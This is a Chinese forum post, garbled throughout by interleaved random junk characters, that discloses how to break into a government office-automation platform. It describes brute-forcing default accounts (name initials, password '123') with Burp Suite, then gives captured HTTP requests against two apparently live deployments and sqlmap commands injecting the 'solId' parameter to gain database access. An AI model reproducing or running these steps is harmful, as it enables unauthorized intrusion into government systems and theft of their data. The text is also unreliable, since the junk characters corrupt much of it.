|
; A8 ]+ }! O$ p% x N
1 L4 n0 r# L( U$ j$ u9 F) w
# I% S0 L g, w+ I
& i6 l+ v# m3 K
平台简介:+ m* D$ y! u6 i/ R( g( q1 V
6 y# h6 _, ?$ G! H+ [
0 F. G B) J3 T( F6 u2 B4 m 4 c5 b# A7 A( p/ Q. ]
1 w$ S9 i9 i/ E8 i. y! O9 V" ~# y5 b
7 D' B6 Y) H/ P' o' E3 B 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
, I3 x5 x- [( r$ x- V+ [同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
6 G* V" s# X: { t) h
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 }4 u$ m$ | v" ~
" |7 ^+ v* ]2 c1 S( S H' Q7 N* d2 Z- N1 w! @6 f/ L+ v
- A2 I$ Q9 ~" { `! x) S + e* y& ^1 _8 J4 k2 b8 ^
! r, r1 ~; c5 g, v; r8 Q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
|8 U# ~- r' z' R, z( } & ?2 [0 n$ X: H& M/ X* Z4 f; ]
, [: C/ p3 U2 K, I% I' u b4 C
, T( a0 C% x8 E4 X9 W& q" l+ J 7 D' t, C$ n/ N y" U
' ~5 R' [$ Z; k7 u& I3 k http://1.1.1.1:7197/cap-aco/#(案例2-)/ _ d: ^* l8 y8 E8 y! t7 Y
, c* d% Z0 k9 j- d
- p) y0 B: C# r( i% ` http://www.XXOO.com (案例1-官网网站)4 G% U. m6 x/ ?; ~8 N! {
% E' \, n4 s# M X
4 q* p) X2 ~ Z# d7 T9 U, X: u ' {3 O5 k9 I- U9 C. N
0 d b2 \5 e. |
2 T5 n* w6 O* j8 s 漏洞详情:- M; X: T- _( ?% O; V+ p
3 O `; v) N7 f
5 d: l$ u5 v) c5 ^& ^- u
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试* b6 c7 |- }8 h8 e, _+ Z
9 g" P' [" j5 o5 T" b4 ]( Q$ }- v
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 B3 l4 h3 s" q/ l9 @! s
: N6 U& c2 {; U+ G3 }
$ G. e$ J a: n- i
1 B) W" B: g9 d: }, M
" }- C0 K! Q6 ?3 h ]" K* I2 [) m3 J& v) D. H" [" `
1 x0 Y( p4 e$ U) S; ~7 j9 |8 r f1 | ( F" G: N7 Z, p4 Q' X1 j
9 o( |5 Q. m k( e- P; `# r status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
+ K% z" Z: D( H7 X* ]/ { $ k" v# o) n. ~
/ A# c1 E6 m) }$ h
1、案例1-官方网站
% m! e2 B j- F) r- \2 e
) @$ f# F+ v3 K' W+ ^
) V- {- B4 t; b0 @2 y GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.13 V7 p9 u/ }* X( D6 C e7 W& P* W
3 V/ N# _, l: A
% @! B9 O9 K$ K Host: www.XXOO.com
( f) }: V' C+ _' J
7 ^1 _: X4 _3 @) J) e# q
# L$ t4 J' E2 M0 U+ A Proxy-Connection: Keep-Alive& t# |- ?. M- C* S9 I* H& U
5 v$ b6 l4 |, s' {
/ i: k- e; y; f/ m Accept: application/json, text/javascript, */*; q=0.01& Z' r: w! Q% G
4 j- ~9 v( }6 K' f8 ^7 O
x. \4 q4 D H- C/ P3 [ ]! U Accept-Language: zh-CN
% z; }, V. d( K; D. b; L# ^9 J2 F
3 D4 q" f- p" l7 d3 ^+ e
, _% C) l* ?' c: {& @: m0 Z* Q Content-Type: application/json
% q& z) P# n5 i. w1 q% V 1 a# f2 D$ {% ?2 ~
- R. ]2 ~1 ?0 T User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
+ s _2 x- ?" `& X
- y- d. M& }/ [- A3 T2 a& R1 w; B: }% L2 |
X-Requested-With: XMLHttpRequest5 a' | H; N/ f$ `( Y0 _
, `& M; v; A! V+ L. q2 Y0 E7 M- d
. ~: [+ a2 }) g
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
6 g; _; I5 B. T+ V! @ 3 F7 g" a1 {0 d9 v% r/ _
* r3 c6 l# e0 x; w( j$ c+ `* m g- E Accept-Encoding: gzip, deflate, sdch
. }+ b/ D4 P( Z; h0 j$ l 2 E; v- u6 h* b ^6 J9 t2 R' C
+ o. f6 v# A( Y4 p( ^/ b, A Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e7 G0 `3 z! v8 u9 M
" \3 b4 Y, m# C1 D
* P+ H) _& n1 |# |6 O! }
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
, [' O( R8 g2 t( ^ % c8 E7 b8 d: d4 o. F! `
* ?" B: T9 `2 \& w, y) V  0 Y$ a6 R& B: O; ?% i
, N! ]* ]* s; Y
* N9 ~, H( v$ g. j- k+ q  + i/ ]( M6 U; m/ d
' c, M q! L- _3 ]9 e0 ?
0 `/ M3 }4 x6 s* f, `' G & H+ \7 v; B. G6 k1 J, I* `
& Z* a6 h" [+ q; Y
2 K/ E1 b0 K8 a- F2 K! y" _ L A3 O- ^4 \
- J6 j3 Y# f( q! v! u
) Z' u! p9 [6 \3 S' \
4 u" ]0 O2 K& f! S . j$ ~+ l T4 q
% ?1 `1 M1 ]8 H8 Y9 V1 X& z' C 2、案例2-某天河云平台
1 k# w. m8 v, C4 r( ? : q, k0 s d* {2 ]: \9 S
1 S6 g1 r+ c+ E9 g; W2 n5 y
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1- N' q0 u) \+ q( { | @ m; I
. U. d( j7 t2 V f
( f f# p: d1 I2 G
Host: 1.1.1.:7197
0 o, P7 l) {& U , }# q+ Z# C" n2 G1 Y
; q4 h6 H, ~" j
Accept: application/json, text/javascript, */*; q=0.01
; [" C" V) ^; D 7 \0 r! y! _7 t
7 n: {7 N4 f- ]' U" X. f# }1 x4 w/ j
X-Requested-With: XMLHttpRequest \; z8 Z) x8 n, O* [: r
" ~4 H: c' [2 @5 p9 o8 Z' J" c6 Z1 h. }1 M- j0 a& n# I, D
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
+ s, O+ V( u0 o, ?# P 8 }' a* p8 f- I' V4 }1 H
% H% ?/ O6 \( L: I. [, B
Content-Type: application/json$ s: k4 v' \/ v- g7 K1 G
" Y! X1 o6 {+ U5 v
; Y2 T: |+ o7 C/ s" ~) n Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008( N' j$ W% ?# }7 x
6 h" P4 ^; v4 u3 D5 T
% e/ C' w) B/ T: M Accept-Language: zh-CN,zh;q=0.8
2 ~" x8 D% `" ~ - V/ r% B. J4 n
, ]/ A; n4 {! @' C' I; l Q% A
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=15 n; b- J0 g# H. L# H$ R; f8 a0 ]
: q: N& k; X- F* _
: `! N. @* ?" A; _$ ~
Connection: close( q" q `* E& h8 @! \0 A2 k
" f, H, L; n; ?& ?. A, Z
- N4 h3 c, c( @ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:! K6 z% Z' ?4 R
# x& Q: i' u. Y
6 f0 B$ P7 B9 @6 L  $ d5 z& Z3 d0 n7 B
7 Z& X4 v, k, Q5 _
0 J7 Y9 H2 ?7 U
5 O8 ]4 _- u/ h& l4 t
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对